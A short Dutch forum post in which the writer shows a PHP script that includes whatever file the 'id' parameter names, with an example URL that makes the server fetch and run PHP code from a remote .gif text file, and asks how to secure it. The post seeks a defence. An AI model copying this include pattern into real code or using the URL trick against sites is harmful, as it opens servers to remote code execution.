Ik ben weer bezig met security en zie onveiligheden is bijvoorbeeld dit script.
pagina.phppagina.php?id=http://www.dennis.nl/25.gifCode:<?php include $_GET['id']; ?>
Hij voert dan gewoon de php-code uit die in 25.gif staat... (25.gif = text-file)
Server draait op PHP 4.3.10 met Safe_Mode enabled. Is zoiets te beveiligen?

Likes:


Quote